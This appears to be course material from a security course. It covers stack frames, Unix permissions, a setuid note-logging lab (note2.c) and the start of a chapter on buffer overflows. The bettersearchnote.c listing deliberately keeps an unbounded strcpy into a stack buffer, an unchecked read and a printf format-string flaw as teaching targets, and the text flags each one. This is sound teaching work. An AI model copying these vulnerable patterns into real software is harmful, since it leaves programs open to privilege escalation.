I now continue running the program and pause just before the closing brace for the function named test_function (so I
am in test_function's stack frame). Consider the screen shot shown below.
(b) Based on the screen capture, add to your sketch by showing:
    the stack frame for test_function (label these EBP-test_function and ESP-test_function).
    The location of flag (Hint: the base-10 value of 1234 is equivalent to 0x4d2)
    The location of buffer
(c) Show, on your diagram, where the return address and the saved value of the base pointer are stored. From
the assembly code snapshots given, determine the value of the stored return address and the value of the
saved base pointer, and annotate these on your figure.
5. After typing in the command, ls -l gethappy.exe you see:
(a) Who is the owner of this file?
(b) What permissions do other users in the owner’s group have?
(c) You (midshipman) are neither the owner nor part of the owner’s group instructor. What command would the
administrator enter to give you permission to read and execute the gethappy.exe file?
6. Continuing Problem 5 above: You (midshipman) now have permission to read and execute the gethappy.exe file.
The function of the gethappy.exe file when executed is to write to the file happytimes.
After multiple attempts, the executable file is not operating as expected. The owner changes the executable file. You
see:
(a) What permission changed? Your answer must include the name of the permission.
(b) How does the change to the file’s permissions affect the execution of the file?
Security Exercise 9
Do you know who I am! Bonus points to the midshipman that can guess this target!
Part I. Initial Set-up
The program you will use today is named note2.c and this program has already been placed on your machine in the EC310code
folder under your home directory. Copy this file to the work directory by carefully entering the following at the home
directory prompt (make sure you are at your home directory!):
midshipman@EC310:~ $ cp ec310code/note2.c work
Verify that you have note2.c in your work directory by changing to the work directory:
cd work
and then listing the files in the work directory:
ls
If you do not have note2.c in your work directory STOP and ask your instructor or lab tech for help. Otherwise, proceed
to Part 2.
Part II. A Truly Useful Program
Before looking at the code, let's discuss the motivation for this program. Here is the scenario: You are the Company
Commander for your Company. The intent of the program is to allow anyone in your Company (who, of course, all have Linux
accounts) to send you a note. All the notes that are sent to you by company-mates will be written into the file /tmp/notes,
one after another. The idea is that you can read all the notes that midshipmen in your Company send you, but the midshipmen
cannot read the notes sent by anyone else (in fact, they can’t even read their own notes once submitted).
To make this more concrete, you might, at the start of the day, write a note (to yourself) that says
Notes received today:
Then, later in the morning, you might get a note from instructor that says:
Nice job applying your Cyber2 skills in the Hall – keep it up.
Then, in the afternoon, your friend mia might send you a note that says:
The wardroom fridge might be on the fritz again.
In the evening, then, you could check the file named /tmp/notes and see all the notes that were left for you during the day.
For this example, you would enter cat /tmp/notes and see:
Notes received today:
Nice job applying your Cyber2 skills in the Hall – keep it up.
The wardroom fridge might be on the fritz again.
But your program is even better than this! Your program includes the user ID of everyone who adds a note! Recall that the
user IDs for the users on your system are:
root         0
mia          500
joe          501
instructor   998
midshipman   999
All right! Time to look at the code!
 1.  #include<stdio.h>
 2.  #include<stdlib.h>
 3.  #include<string.h>
 4.  #include<fcntl.h>
 5.  #include<sys/stat.h>
 6.  #include<unistd.h>                                /* getuid, write and close */
 7.  int main( int argc , char *argv[ ] )
 8.  {
 9.      int fd ;                                      /* file descriptor for /tmp/notes */
10.
11.      int userid;                                   /* ID of the user running the program */
12.
13.      char *buffer ;
14.
15.      buffer = (char *)malloc(100);                 /* 100 bytes on the heap for the note */
16.
17.      strcpy( buffer , argv[ 1 ] );                 /* copy the command line argument into buffer */
18.
19.      strncat( buffer , "\n" , 1 );                 /* append a newline */
20.
21.      fd = open("/tmp/notes", O_RDWR|O_CREAT|O_APPEND , S_IRUSR|S_IWUSR );
22.
23.      userid = getuid( ) ;                          /* who is running the program? */
24.
25.      write( fd , &userid , 4 );                    /* the user ID, as 4 raw bytes */
26.
27.      write( fd , "\n" , 1 );                       /* a newline */
28.
29.      write( fd , buffer , strlen( buffer ) );      /* then the note itself */
30.
31.      free( buffer );
32.
33.      close( fd );
34.  }
In the explanation that follows, let's presume that the executable file is named ./note2.exe (instead of ./a.out) and let's
presume that the user named mia runs the program by entering
./note2.exe "What is for evening meal?"
Notice that argv[1] is the string:
"What is for evening meal?"
Line 9 declares an integer named fd that will later hold the file descriptor for the file /tmp/notes. Line 11 declares an
integer named userid that will later hold the user ID for the user entering a particular note.
Lines 13 and 15 allocate space for 100 bytes on the heap to hold a string of 100 characters. The name of the string is buffer
(so buffer points to the first character in the string). Line 17 copies argv[1] to buffer, so, in our example, buffer
will now hold the string "What is for evening meal?" (followed by the NULL).
Line 19 appends a newline character to buffer (and this occurs before the NULL), so, after line 19, buffer contains the string
"What is for evening meal?\n" followed by the NULL.
Line 21 assigns a file descriptor to the file named "/tmp/notes" and places the file descriptor in the integer variable
named fd that was declared on line 9. From this point onward, whenever we wish to refer to the file "/tmp/notes" we
will use the file descriptor fd.
Line 23 contains a function we have not seen before: the function getuid( ). This function returns the ID of the user
running the program. Recall that in our example, the user mia is running the program, so getuid( ) will return the value
500, which is mia's ID.
So, line 23:
userid = getuid( ) ;
will assign the value 500 to the integer variable userid which was declared on line 11.
Up to this point in the program, information has been placed on the heap (in the string named buffer), but nothing yet has
been written to the file /tmp/notes. Line 25 performs the first operation to write to the file, and notice that what is written
is the user's ID followed by (on line 27) a new line character. Then, on line 29, we write the contents of buffer to the file.
So, at this point, the file /tmp/notes contains:
500
What is for evening meal?
Finally, line 31 frees space on the heap and line 33 closes the file.
Now, suppose an hour later, user instructor (whose ID is 998) runs the program by entering:
./note2.exe "When is the next parade?"
After instructor is done running the program, the file "/tmp/notes" contains:
500
What is for evening meal?
998
When is the next parade?
So when you, the Company Commander, review the file at the end of the day, you can see all the notes left for you and, just as
important, who it is that left each of the notes.
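As an added example that is not part of the lab handout, here is a C parser for the record layout that note2.exe produces: a 4-byte user ID, a newline, the note text, a newline. It reassembles the user ID explicitly from little-endian bytes, which is the order in which the Part IV hexdump shows them, so the program can explain a dump rather than just reproduce it. The sample bytes are constructed here to match the two notes just traced (mia = 500, instructor = 998); the function and type names are this example's own.

```c
#include <stdio.h>
#include <string.h>

struct note { unsigned int uid; char text[100]; };

/* note2.c writes the int with write(fd, &userid, 4), so the bytes land in the
 * CPU's own order.  On the x86 machines used in EC310 that is little-endian:
 * the bytes e7 03 00 00 mean 0x000003e7 = 999.  Reassembling the value from
 * the individual bytes makes the parser give the same answer on any machine. */
unsigned int uid_from_le_bytes(const unsigned char *b)
{
    return (unsigned int)b[0]
         | ((unsigned int)b[1] << 8)
         | ((unsigned int)b[2] << 16)
         | ((unsigned int)b[3] << 24);
}

/* Parse records of the form <4-byte uid><'\n'><note text><'\n'>.
 * Returns the number of notes stored in out, or -1 if the data ends in the
 * middle of a record (for example a note without its closing newline). */
int parse_notes(const unsigned char *buf, size_t len, struct note *out, int max)
{
    size_t pos = 0;
    int count = 0;

    while (pos < len && count < max) {
        size_t start, n;

        if (len - pos < 5 || buf[pos + 4] != '\n')  /* uid plus its newline */
            return -1;
        out[count].uid = uid_from_le_bytes(buf + pos);
        pos += 5;

        start = pos;
        while (pos < len && buf[pos] != '\n')
            pos++;
        if (pos == len)
            return -1;                               /* text never terminated */
        n = pos - start;
        if (n > sizeof out[count].text - 1)
            n = sizeof out[count].text - 1;          /* clip, never overflow text[] */
        memcpy(out[count].text, buf + start, n);
        out[count].text[n] = '\0';
        pos++;                                       /* step over the newline */
        count++;
    }
    return count;
}

/* Constructed sample: the bytes note2.exe appends for the two notes above
 * (mia is uid 500 = 0x1f4, instructor is uid 998 = 0x3e6). */
static const unsigned char SAMPLE[] =
    "\xf4\x01\x00\x00\nWhat is for evening meal?\n"
    "\xe6\x03\x00\x00\nWhen is the next parade?\n";
#define SAMPLE_LEN (sizeof SAMPLE - 1)      /* drop the literal's trailing NUL */

static struct note parsed[8];
static int parsed_count = -2;               /* -2 means "not parsed yet" */

static void ensure_parsed(void)
{
    if (parsed_count == -2)
        parsed_count = parse_notes(SAMPLE, SAMPLE_LEN, parsed, 8);
}

int sample_note_count(void)       { ensure_parsed(); return parsed_count; }
unsigned int sample_uid(int i)    { ensure_parsed(); return parsed[i].uid; }
const char *sample_text(int i)    { ensure_parsed(); return parsed[i].text; }

/* Same bytes with the final newline missing: the parser reports the damage
 * instead of guessing. */
int truncated_sample_result(void)
{
    struct note tmp[8];
    return parse_notes(SAMPLE, SAMPLE_LEN - 1, tmp, 8);
}

int main(void)
{
    int i;
    for (i = 0; i < sample_note_count(); i++)
        printf("uid %u wrote: %s\n", sample_uid(i), sample_text(i));
    return 0;
}
```

This is also why cat shows the ID as garbage: the four bytes are a binary integer, not the characters "500", and the ASCII table has control characters and accented letters at those positions. A reader of the file has to know the layout and decode the integer itself, which is exactly what Part IV asks you to do by hand.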
Part III. Practice Running the Program
Let's compile the program saving the machine language file under the name note2.exe by entering:
gcc -g -o note2.exe note2.c
Then add the first line to the file /tmp/notes by entering:
./note2.exe "Notes received today:"
Examine the file /tmp/notes by entering:
cat /tmp/notes
Notice that your ID number is garbled! That is because you are attempting to print out the integer 999 (your ID number) as a
character. We'll address this later.
Now, check permissions for note2.exe and /tmp/notes by entering:
ls -l note2.exe /tmp/notes
You should see:
Question 1: Who owns the file note2.exe ?
Question 2: List all of the users who are able to write to the file named /tmp/notes.
You tell all of your company-mates that they have execute permission for the file note2.exe, and that they are to start
sending you messages during the day, and you will review their messages and reply each evening.
The first evening arrives, you look at the file /tmp/notes and you see only your message (Notes received today:).
Your company-mates mia and joe insist that they sent you messages during the day. Hmm…it seems that messages left
by other individuals are not being saved, even though everyone has permission to execute the program note2.exe.
Question 3: Why are other users not experiencing success with this program?
Question 4: What command should you enter to remedy the problem you noted in Question 3? (Do it!)
(Hint: if you answered Question 4 correctly, then, upon entering ls -l note2.exe you should see
Now, let's see how the program would look from mia's perspective.
First, switch to user mia by entering
sudo su mia
Now, the prompt should indicate that you are the user named mia.
Cool - You're mia!!!
Now, noticing that you are mia, run the program by entering:
./note2.exe "A message from Mia."
Now, as mia, examine the file /tmp/notes by typing:
cat /tmp/notes
Question 5: Was mia successful in looking at the file /tmp/notes? Why/Why not?
Switch back to being the user named midshipman by entering
exit
Now, examine the file /tmp/notes by typing:
cat /tmp/notes
Question 6: Was the message from mia saved in the file?
Question 7: Is the following statement true or false:
Only the user named midshipman can freely read from or write to the file named /tmp/notes. Other
users are permitted to write to the file, but only in a very restricted sense: via the use of the program
note2.exe.
Enter the command
ls -l /tmp/notes
Your friend sees the result and says: I see that only the file's owner, midshipman, is able to read or write to the file. But we
just saw that mia was able to write to the file? How is that possible?
Question 8: How would you answer your friend's question?
Part IV. Autopsy of the File Named /tmp/notes
First, let's delete the current file named /tmp/notes so that we can start fresh.
rm /tmp/notes
Recall that rm stands for "remove." Verify that the file has been removed by typing:
cat /tmp/notes
You should see the message: No such file or directory
From your work directory, carefully enter the following at the command prompt:
cp ../ec310code/notes /tmp
Now, recall that you are the user midshipman. Not just any midshipman. The Company Commander! You are very proud
of having reached this position. Your people love you. You check the messages left by your company-mates by typing
cat /tmp/notes
and you see:
ARGGHH! You want to have a talk with the midshipman who sent you the next-to-last note. Was it your friend Mia? Or,
perhaps it was Joe? We need to find out who it is! That midshipman needs to be counseled on respectful communication and
constructive feedback! Haven’t we learned anything in this leadership laboratory?!
In Part III above we mentioned that the ID numbers are garbled. But we can look at the file in hexadecimal.
Enter:
hexdump -C /tmp/notes
You should see this:
Examining the hexdump of the file /tmp/notes , our goal is to determine who left the note
You suck – worst CC EVER.
For convenience, the ASCII table is presented below.
Let’s go to the top of the hex dump. We know that the first text we have is: Notes received today:
Let’s focus just on the capital N and small o (i.e., the first two letters of Notes received today)
Question 9:
Determine how the text No would be stored in memory in hexadecimal notation.
Locate these values (from Question 9) in the hex code display.
Question 10:
According to the ASCII table, what is the meaning of the byte that immediately precedes No in the
hexdump?
Question 11:
The first four bytes in the hex dump are e7 03 00 00. Since, for every note that is entered, the
user id number of the note writer, a new line, and the actual note are written to the /tmp/notes
file, what is the significance of these first four bytes?
Question 12.
Since the first four bytes are stored in little-endian order, rewrite these four bytes in their actual
order.
Question 13.
Convert your answer to Question 12 to a decimal integer.
Question 14.
What is the significance of this value? (Hint, look at the top of the first page of this Security
Exercise.)
Question 15.
Use all your sleuthing abilities to find the hexadecimal value associated with the unpleasant person
who left the note
You suck – worst CC EVER.
What is the hex value of the user id number of the person who left this note?
Question 16.
Convert your answer for Question 15 to a decimal value.
Question 17.
Who gets fried?
Security Exercise 9 Answer Sheet
Name:
Question 1:
Question 2:
Question 3:
Question 4:
Question 5:
Question 6:
Question 7:
Question 8:
Question 9:
Question 10:
Question 11:
Question 12:
Question 13:
Question 14:
Question 15:
Question 16:
Question 17:
Chapter 10: A Real Buffer Overflow
Objectives:
(a) Describe how a buffer overflow attack can be used to gain root access to a computer.
(b) Describe two techniques that a hacker can use to make it simpler to craft a buffer overflow.
(c) Describe technical solutions that have been proposed to prevent a program from being exploited by a buffer overflow.
1. Note-Taking and Note-Searching Programs
1.1. Review of Security Exercise 9 Last time in lab you looked at a fascinating program (named note2.c) that takes a
scintillating text string as a command line argument, and then appends the scintillating text string to the end of the fabulous file
with pathname /tmp/notes. The program also appends—to the very front of a note—the user ID of anyone who adds a note.
You use this program in your capacity as Company Commander: anyone in your Company can send you a note. The idea is
that you can read all the notes that midshipmen in your Company send you, but the midshipmen cannot read the notes sent by
anyone else (and can’t even read their own notes once submitted). By examining the user ID, you can identify all the
“anonymous” (ha, ha) note senders. The program is repeated below.
#include<stdio.h>
#include<stdlib.h>
#include<string.h>
#include<fcntl.h>
#include<sys/stat.h>
#include<unistd.h>      /* getuid, write and close */
int main( int argc , char *argv[ ] )
{
    int fd ;
    int userid ;
    char *buffer ;
    buffer = (char *)malloc(100);                 /* 100 bytes on the heap for the note */
    strcpy( buffer , argv[ 1 ] );                 /* copy the command line argument into buffer */
    strncat( buffer , "\n" , 1 );                 /* append a newline */
    fd = open( "/tmp/notes", O_RDWR|O_CREAT|O_APPEND , S_IRUSR|S_IWUSR );
    userid = getuid( ) ;                          /* the ID of whoever is running the program */
    write( fd , &userid , 4 );                    /* the user ID, as 4 raw bytes */
    write( fd , "\n" , 1 );
    write( fd , buffer , strlen( buffer ) );      /* then the note itself */
    free( buffer );
    close( fd );
}
Recall that when you first wrote this program, your company mates could not start immediately sending you notes. You first
had to grant setuid permission by entering: chmod u+s note2.exe.
After that, anyone could run the program, and the program would then execute as though executed by the owner. The file
/tmp/notes that you looked at in the last lab was built as follows:
First you (midshipman) entered: Notes received today:
Then instructor entered: The wardroom fridge might be on the fritz again.
Then matrix entered: Thanks for the notes.
Then joe entered: You suck – worst CC EVER.
Then matrix entered: Great spirit spot-BZ.
And you saw all that you had made, and it was very good. And there was evening, and there was morning—the ninth EC310
chapter.
1.2. A New Program The program note2.c is actually practical and useful. But it would be nice for a user to be able to
explore the file /tmp/notes to see the notes that they had entered. Of course they should not be able to view the notes
that were written by anyone else.
For example, given the notes entered as shown above, if joe were to execute this hypothetical program, he would see:
and if matrix runs the program she would see:
Moreover, it would be nice if the program had one additional feature. It would be nice if the user could run the program with
the option of specifying an additional command line argument. This command line argument would be a string, and the
improved program would only return the user's comments containing that string. The following screen capture should illustrate
how we would like the improved program to run.
Presented below is a program, which we will name bettersearchnote.c , that does precisely this. This program is, quite
obviously, the longest program you have seen (or will see!) in EC310. This program is powerful and complex. Our goal is
that you understand the program in general terms. We present the program all at once below, but in the following pages we
will describe the operation of each of its functions one-by-one. So… hang on!
#include<stdio.h>
#include<string.h>
#include<fcntl.h>
#include<sys/stat.h>
#include<unistd.h>      /* read, lseek, close and getuid */

int find_user_note( int fd , int user_uid );
int print_notes( int fd , int uid , char *searchstring );
int search_note( char *note , char *keyword );

/* Scan forward through /tmp/notes until a note written by user_uid is found.
   Leaves the file position at the start of that note's text and returns the
   text length (including its newline), or -1 if no such note remains. */
int find_user_note( int fd , int user_uid )
{
    int note_uid = -1 ;
    unsigned char byte ;
    int length;
    while( note_uid != user_uid )
    {
        if( read( fd , &note_uid , 4 ) != 4 )      /* the 4-byte user ID */
            return -1 ;
        if( read( fd , &byte , 1 ) != 1 )          /* the newline after the ID */
            return -1 ;
        byte = 0;
        length = 0;
        while( byte != '\n' )                      /* count the note's bytes */
        {
            if( read( fd , &byte , 1 ) != 1 )
                return -1;
            length = length + 1 ;
        }
    }
    lseek( fd , length * -1 , SEEK_CUR );          /* back up to the start of the note */
    return length ;
}

/* Print the next note belonging to uid if it contains searchstring.
   Returns 0 when there are no more notes for this user, 1 otherwise. */
int print_notes( int fd , int uid , char *searchstring )
{
    int note_length ;
    char byte = 0 ;
    char note_buffer[ 100 ] ;
    note_length = find_user_note( fd , uid );
    if( note_length == -1 )
        return 0;
    read( fd , note_buffer , note_length ) ;
    note_buffer[ note_length ] = 0 ;
    if( search_note( note_buffer , searchstring ) )
        printf( note_buffer );
    return 1;
}

/* Return 1 if keyword appears in note (an empty keyword matches every note). */
int search_note( char *note , char *keyword )
{
    int i;
    int keyword_length ;
    int match = 0;
    keyword_length = strlen( keyword );
    if( keyword_length == 0 )
        return 1;
    for( i = 0 ; i < strlen( note ) ; i = i + 1 )
    {
        if( note[ i ] == keyword[ match ] )
            match = match + 1 ;
        else
        {
            if( note[ i ] == keyword[ 0 ] )
                match = 1 ;
            else
                match = 0 ;
        }
        if ( match == keyword_length )
            return 1;
    }
    return 0;
}

int main( int argc , char *argv[ ] )
{
    int user_id;
    int fd;
    int printing = 1;
    char searchstring[ 100 ] ;
    if( argc > 1 )
        strcpy( searchstring , argv[ 1 ] ) ;     /* This innocent looking line of code is a
                                                    potential buffer overflow! Do you see why? */
    else
        searchstring[ 0 ] = 0 ;
    user_id = getuid( );
    fd = open( "/tmp/notes" , O_RDONLY );
    while( printing )
        printing = print_notes( fd , user_id , searchstring );
    close( fd );
}
So, notice that we have four functions: find_user_note , print_notes , search_note and main . We'll start (as
all programs start) with the main function.
The main function
1.  int main( int argc , char *argv[ ] )
2.  {
3.      int user_id;
4.      int fd;
5.      int printing = 1;
6.      char searchstring[ 100 ] ;
7.      if( argc > 1 )
8.          strcpy( searchstring , argv[ 1 ] ) ;
9.      else
10.         searchstring[ 0 ] = 0 ;
11.     user_id = getuid( );
12.     fd = open( "/tmp/notes" , O_RDONLY );
13.     while( printing )
14.         printing = print_notes( fd , user_id , searchstring );
15.     close( fd );
16. }
Four variables are declared in main. First, the integer user_id is declared in line 3. In line 11, this variable is assigned
the ID of the person running the program. So, for example, if joe is running the program, then user_id will be assigned
the value 501.
Next, the integer fd is declared in line 4. This variable will hold the file descriptor for the file /tmp/notes. The variable
fd is tied to the file /tmp/notes in line 12.
Third, the string named searchstring , declared in line 6, will hold the optional command line argument. If argc is
greater than 1 then the user did enter the optional argument, and this command line argument is copied into searchstring in
line 8. Note that strcpy copies all of argv[1], whatever its length, into a buffer of only 100 bytes; this is the line flagged in
the listing above. If the user did not enter the optional command line argument, then a NUL byte is placed in searchstring[0]
on line 10, making it the empty string.
The variable printing is initially assigned the value 1 in line 5, so we will always enter the body of the while loop on line
13 at least once. (Note that in C, if a Boolean expression evaluates to an integer other than zero, the Boolean expression is
interpreted as true.)
This while loop calls the function named print_notes.
We will look at the function print_notes in a moment, but for now, accept on faith that the function print_notes will
look for a note from this user_id containing the searchstring, and if successful, will print out the note to the monitor
and then will return the value 1. If the value 1 is returned by print_notes, the while loop (line 13) will iterate again.
That will call the function print_notes again, and the function will look further into the file /tmp/notes (picking up
where it left off) and again search for a note from this user_id containing the searchstring. The function
print_notes will keep setting printing to 1 so long as the user with ID equal to user_id still has notes in the file
/tmp/notes. Eventually, there will be no more notes in the file /tmp/notes from this user_id containing the desired
searchstring, and, at that point, the function print_notes will return a 0. That ends the while loop's iteration and
ends the program.
The print_notes function
Let's now turn our attention to the function print_notes.
1.  int print_notes( int fd , int uid , char * searchstring )
2.  {
3.      int note_length ;
4.      char byte = 0 ;
5.      char note_buffer[ 100 ] ;
6.      note_length = find_user_note( fd , uid );
7.      if( note_length == -1 )
8.          return 0;
9.      read( fd , note_buffer , note_length ) ;
10.     note_buffer[ note_length ] = 0 ;
11.     if( search_note( note_buffer , searchstring ) )
12.         printf( note_buffer );
13.     return 1;
14. }
The integer variable note_length is declared on line 3. On line 6, the function named find_user_note is called, and
the return value from this function is placed in note_length. For now, accept on faith that the function find_user_note
returns the length of the next note in the file /tmp/notes that was put there by the user with ID equal to user_id . If the
function finds no such note, it returns -1.
So, at line 7, the variable note_length will contain either the number of bytes that were in a note left by the user running
the program, or will contain the value of -1 if no such note was found. If note_length does equal -1, then zero will be
returned to main on line 8, ending the iteration of the while loop in main.
The read function moves sequentially through a file without backing up. In other words, the read function starts reading
from a file precisely where the last read function left off.
In line 5, a string named note_buffer is declared, and on line 9, we read from the file a number of bytes equal to
note_length into the string note_buffer. The practical effect is that note_buffer now contains the next note that
was in the file /tmp/notes left by the user running the program. We then, in line 10, terminate the string with a NUL.
(Observe that note_buffer holds only 100 bytes, while note_length is whatever find_user_note counted, and the
read on line 9 never compares the two. A note of 100 bytes or more would therefore overrun note_buffer in the same way
that an over-long argv[1] overruns searchstring in main.)
In line 11, we call the function named search_note giving the function as inputs note_buffer (which contains a string
left by this particular user found in the file /tmp/notes) and the string searchstring (which contains the characters
that the user entered as argv[1] ). If the desired searchstring is found within the string note_buffer, the function
search_note will return 1 and the contents of note_buffer will be printed to the monitor on line 12. This ensures that
we only print out notes from the user running the program if they contain the desired search string. (Line 12 hands the
note itself to printf as the format string; this is the pattern behind the format string vulnerabilities mentioned at the end
of this chapter, and the safe spelling is printf( "%s" , note_buffer ).)
The find_user_note function
1.  int find_user_note( int fd , int user_uid )
2.  {
3.      int note_uid = -1 ;
4.      unsigned char byte ;
5.      int length;
6.      while( note_uid != user_uid )
7.      {
8.          if( read( fd , &note_uid , 4 ) != 4 )
9.              return -1 ;
10.         if( read( fd , &byte , 1 ) != 1 )
11.             return -1 ;
12.         byte = 0;
13.         length = 0;
14.         while( byte != '\n' )
15.         {
16.             if( read( fd , &byte , 1 ) != 1 )
17.                 return -1;
18.             length = length + 1 ;
19.         }
20.     }
21.     lseek( fd , length * -1 , SEEK_CUR );
22.     return length ;
23. }
The function find_user_note searches through the file with descriptor fd, searching for a note from the user with ID
equal to user_uid. If it finds such a note, it returns the length of that note.
The integer note_uid is declared in line 3 and initialized to -1. Recall that when users run the Company Commander's
program to leave notes in the file /tmp/notes, their user ID is recorded before their note. The intent is that note_uid will
hold the user ID of the note being examined. Since the user ID cannot be equal to -1, the while loop on line 6 always iterates
at least once.
The if statement on lines 8-9 reads the user ID from the file /tmp/notes and places this value in note_uid. If we cannot
succeed in reading in the user ID, we must be at the end of the file, and we return a value of -1 on line 9.
The if statement on lines 10-11 reads past the newline character which always follows the user ID in the file /tmp/notes.
Thus, at the start of line 14, note_uid contains the user ID of the note that is about to be read from the file, and the read
function is positioned at the first character in this note.
The while loop on lines 14-19 simply reads through the file, byte-by-byte, counting the characters read up to and including
the newline that ends the note. The variable length, initialized to zero on line 13, keeps track of this running sum. When
we reach the newline character, the while loop on line 14 stops iterating, and length contains the length of the note left by
the user with ID equal to note_uid (counting the trailing newline).
We then return to line 6, and examine the Boolean expression governing this while loop. If the ID of the user whose note
was just scanned ( note_uid ) is not equal to the ID of the person running the program ( user_uid ), then the note that
was just scanned is of no interest to us. We simply execute the while loop on lines 6-20 all over again, placing the ID of the
next note in note_uid and counting up the characters in this next note.
On the other hand if, upon returning to line 6 and examining the Boolean expression governing this while loop, we find that
the ID of the user whose note was just scanned ( note_uid ) is equal to the ID of the person running the program
( user_uid ), then we have indeed found a note left by the person running the program. In this case, we exit the line 6
while loop and jump to line 21.
At the start of line 21, we have found a note from the individual running the program, and we know the length of this user's
note. But, unfortunately, in determining the length of the user's note we have read past the end of the user's note in the file
/tmp/notes. So, in line 21, we move the file position back to the start of this user's note: lseek with an offset of
-length relative to the current position ( SEEK_CUR ) backs up exactly length bytes. After line 21, the next call to
read will start reading the file /tmp/notes at the start of the note of the user whose ID is in user_uid.
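The following is an added example written for these notes; it is not part of bettersearchnote.c. It walks the same /tmp/notes record layout that find_user_note and print_notes walk (a 4-byte user ID as the program reads it with read( fd , &note_uid , 4 ), a newline, the note text, a newline), but over an in-memory copy of the file so it runs without note2.exe or a setuid binary, and with the one check print_notes lacks: the copy into the caller's buffer is bounded. The sample file is constructed to mirror Part II of the lab; root is uid 0 and joe is 501 as stated in the notes, while matrix's uid (502) and the assumption that note2.exe writes the uid as a raw host-order 4-byte integer are the author's of this example.

```c
#include <stdio.h>
#include <string.h>
#include <stdint.h>

#define NOTE_BUFFER_SIZE 100  /* same size as note_buffer in print_notes */

/* Append one record (4-byte uid in host order, '\n', text, '\n') to file[cap]
 * at *len. That note2.exe writes exactly this layout is assumed. */
int append_note(unsigned char *file, size_t cap, size_t *len,
                uint32_t uid, const char *text)
{
    size_t tlen = strlen(text);
    if (*len + 4 + 1 + tlen + 1 > cap)
        return 0;                               /* file buffer full */
    memcpy(file + *len, &uid, 4);
    *len += 4;
    file[(*len)++] = '\n';
    memcpy(file + *len, text, tlen);
    *len += tlen;
    file[(*len)++] = '\n';
    return 1;
}

/* Bounded counterpart of find_user_note plus the read in print_notes. From
 * *pos, finds the next record owned by uid, copies its text (minus the trailing
 * newline) into out[outsz] as a C string, advances *pos and returns the text
 * length. Returns -1 at end of file or on a truncated record, and -2 when the
 * note would not fit in out[], the case print_notes silently overflows on. */
int next_note(const unsigned char *file, size_t len, size_t *pos,
              uint32_t uid, char *out, size_t outsz)
{
    while (*pos + 5 <= len) {
        uint32_t note_uid;
        memcpy(&note_uid, file + *pos, 4);
        size_t start = *pos + 5;                /* skip uid and its newline */
        const unsigned char *nl = memchr(file + start, '\n', len - start);
        if (nl == NULL)
            return -1;                          /* truncated record */
        size_t text_len = (size_t)(nl - (file + start));
        *pos = start + text_len + 1;            /* step past this record */
        if (note_uid != uid)
            continue;
        if (text_len + 1 > outsz)
            return -2;                          /* refuse instead of overflow */
        memcpy(out, file + start, text_len);
        out[text_len] = '\0';
        return (int)text_len;
    }
    return -1;
}

/* Drives next_note the way main's while loop drives print_notes, counting uid's
 * notes containing keyword ("" matches every note, as in search_note).
 * Returns -2 if one of uid's notes is too long for the buffer. */
int count_matching(const unsigned char *file, size_t len,
                   uint32_t uid, const char *keyword)
{
    char buf[NOTE_BUFFER_SIZE];
    size_t pos = 0;
    int count = 0, n;
    while ((n = next_note(file, len, &pos, uid, buf, sizeof buf)) >= 0)
        if (strstr(buf, keyword) != NULL)
            count++;
    return n == -2 ? -2 : count;
}

/* Constructed sample mirroring Part II of the lab (matrix's uid 502 assumed). */
size_t build_sample(unsigned char *file, size_t cap)
{
    size_t len = 0;
    append_note(file, cap, &len, 0,   "Notes for today:");
    append_note(file, cap, &len, 501, "Parades stink");
    append_note(file, cap, &len, 502, "What is for lunch?");
    append_note(file, cap, &len, 501, "Musters stink");
    return len;
}

/* count_matching over the sample; with add_long_note set, a 150-byte note is
 * first appended for joe, the input on which print_notes would write 150 bytes
 * into note_buffer[100]. */
int sample_count(uint32_t uid, const char *keyword, int add_long_note)
{
    unsigned char file[512];
    char longnote[151];
    size_t len = build_sample(file, sizeof file);
    if (add_long_note) {
        memset(longnote, 'x', 150);
        longnote[150] = '\0';
        append_note(file, sizeof file, &len, 501, longnote);
    }
    return count_matching(file, len, uid, keyword);
}

int main(void)
{
    printf("joe, all notes:      %d\n", sample_count(501, "", 0));
    printf("joe, \"Must\":        %d\n", sample_count(501, "Must", 0));
    printf("root, all notes:     %d\n", sample_count(0, "", 0));
    printf("joe after long note: %d\n", sample_count(501, "", 1));
    return 0;
}
```

The uid comparison happens before the size check, so an over-long note belonging to some other user is simply skipped; only a note the caller would actually copy can produce -2, which is the point at which print_notes would already have overrun note_buffer.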
The search_note function
The search_note function takes two arguments: a string containing a note left by the user running the program, and the
searchstring that was entered by the user as a command line argument. If the searchstring is found anywhere within
the note left by the user, the program returns a value of 1. If the searchstring is not found within the user's note, the
function returns a value of 0.
You should be able to navigate through this function given the skills you have developed to date. The gory details of the
function are left as an exercise.
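As an added check on that exercise (this block is not part of the EC310 notes), the search_note function from bettersearchnote.c is reproduced below unchanged, next to the same question answered with strstr from the C library. The matcher keeps a single running count of matched characters and, on a mismatch, only ever restarts at 1 or 0; it never re-examines the characters it has already consumed. On the lab's inputs ("Musters stink" against "Must") it agrees with strstr, but on a note in which the keyword is preceded by a partial copy of itself it returns 0 for a note that does contain the keyword. The test inputs are constructed for this example.

```c
#include <stdio.h>
#include <string.h>

/* search_note exactly as it appears in bettersearchnote.c */
int search_note(char *note, char *keyword)
{
    int i;
    int keyword_length;
    int match = 0;
    keyword_length = strlen(keyword);
    if (keyword_length == 0)
        return 1;
    for (i = 0; i < strlen(note); i = i + 1)
    {
        if (note[i] == keyword[match])
            match = match + 1;
        else
        {
            if (note[i] == keyword[0])
                match = 1;
            else
                match = 0;
        }
        if (match == keyword_length)
            return 1;
    }
    return 0;
}

/* Reference answer: 1 if keyword occurs anywhere in note, else 0. */
int contains(const char *note, const char *keyword)
{
    return strstr(note, keyword) != NULL;
}

/* 1 when search_note and strstr give the same answer for this input. */
int matcher_agrees(char *note, char *keyword)
{
    return search_note(note, keyword) == contains(note, keyword);
}

int main(void)
{
    /* Constructed cases: the lab's own query, a note where a partial copy of
     * the keyword precedes the real match, and a near miss that both reject. */
    char *cases[][2] = {
        { "Musters stink", "Must" },
        { "aaab",          "aab"  },
        { "abab",          "abb"  },
    };
    size_t n = sizeof(cases) / sizeof(cases[0]);
    for (size_t k = 0; k < n; k++)
        printf("note=%-14s keyword=%-5s search_note=%d strstr=%d\n",
               cases[k][0], cases[k][1],
               search_note(cases[k][0], cases[k][1]),
               contains(cases[k][0], cases[k][1]));
    return 0;
}
```

Trace "aaab" against "aab" by hand: after the first two characters match is 2; the third 'a' fails against keyword[2] but equals keyword[0], so match drops to 1; the final 'b' then fails against keyword[1] and the loop ends with 0, even though "aab" starts at the second character. A one-line strstr call avoids the problem entirely.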
At this point, we’ll break for the Security Exercise. Let's jump to Security Exercise 10! After the Security Exercise is done,
we’ll return to your regularly scheduled lecture.
